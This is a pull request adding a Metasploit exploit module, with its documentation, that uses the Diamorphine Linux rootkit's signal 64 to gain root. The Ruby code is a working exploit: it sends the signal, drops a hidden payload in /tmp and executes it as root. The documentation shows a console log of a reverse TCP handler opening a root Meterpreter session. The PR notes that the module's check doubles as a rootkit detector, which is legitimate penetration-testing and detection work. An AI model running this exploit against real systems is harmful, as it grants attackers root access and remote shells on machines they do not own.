### PR TITLE
Add Diamorphine Rootkit Signal Privilege Escalation module

### DIFF
--- a/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md
@@ -1,0 +1,66 @@
+## Vulnerable Application
+
+  [Diamorphine](https://github.com/m0nad/Diamorphine) is a Linux Kernel Module (LKM) rootkit.
+
+  This module uses Diamorphine rootkit's privesc feature using signal
+  64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+  This module has been tested successfully with Diamorphine from `master`
+  branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/diamorphine_rootkit_signal_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SIGNAL**
+
+  Diamorphine elevate signal. (default: `64`)
+
+
+## Scenarios
+
+### Linux Mint 19 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
+
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
+  msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing id ...
+  uid=0(root) gid=0(root) groups=0(root),1001(test)
+  [*] Writing '/tmp/.hwL5UoDL6mfZ' (207 bytes) ...
+  [*] Executing /tmp/.hwL5UoDL6mfZ & echo  ...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.228
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.228:47694) at 2020-02-16 09:28:59 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.228
+  OS           : LinuxMint 19 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+

--- a/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb
+++ b/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb
@@ -1,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Diamorphine Rootkit Signal Privilege Escalation',
+      'Description'    => %q{
+        This module uses Diamorphine rootkit's privesc feature using signal
+        64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+        This module has been tested successfully with Diamorphine from `master`
+        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'm0nad', # Diamorphine
+          'bcoles' # Metasploit
+        ],
+      'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
+      'References'     =>
+        [
+          ['URL', 'https://github.com/m0nad/Diamorphine']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def signal
+    datastore['SIGNAL'].to_s
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+    chmod path, 0755
+  end
+
+  def cmd_exec_elevated(cmd)
+    vprint_status "Executing #{cmd} ..."
+    res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
+    vprint_line res unless res.blank?
+    res
+  end
+
+  def check
+    res = cmd_exec_elevated 'id'
+
+    if res.include?('invalid signal')
+      return CheckCode::Safe("Signal '#{signal}' is invalid")
+    end
+
+    unless res.include?('uid=0')
+      return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
+    end
+
+    CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 8..12}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup payload_path
+
+    cmd_exec_elevated "#{payload_path} & echo "
+  end
+end


### PR DESCRIPTION
Add Diamorphine Rootkit Signal Privilege Escalation module.

        This module uses Diamorphine rootkit's privesc feature using signal
        64 to elevate the privileges of arbitrary processes to UID 0 (root).

        This module has been tested successfully with Diamorphine from `master`
        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Diamorphine's features, beyond simply leveraging the privesc signal to elevate privileges.

The value of this module is largely derived from the `check` method. If the rootkit has been configured to handle the default signal (`64`), then this module can also be leveraged by `post/multi/recon/local_exploit_suggester` to scan a host for Diamorphine while performing other privesc checks.
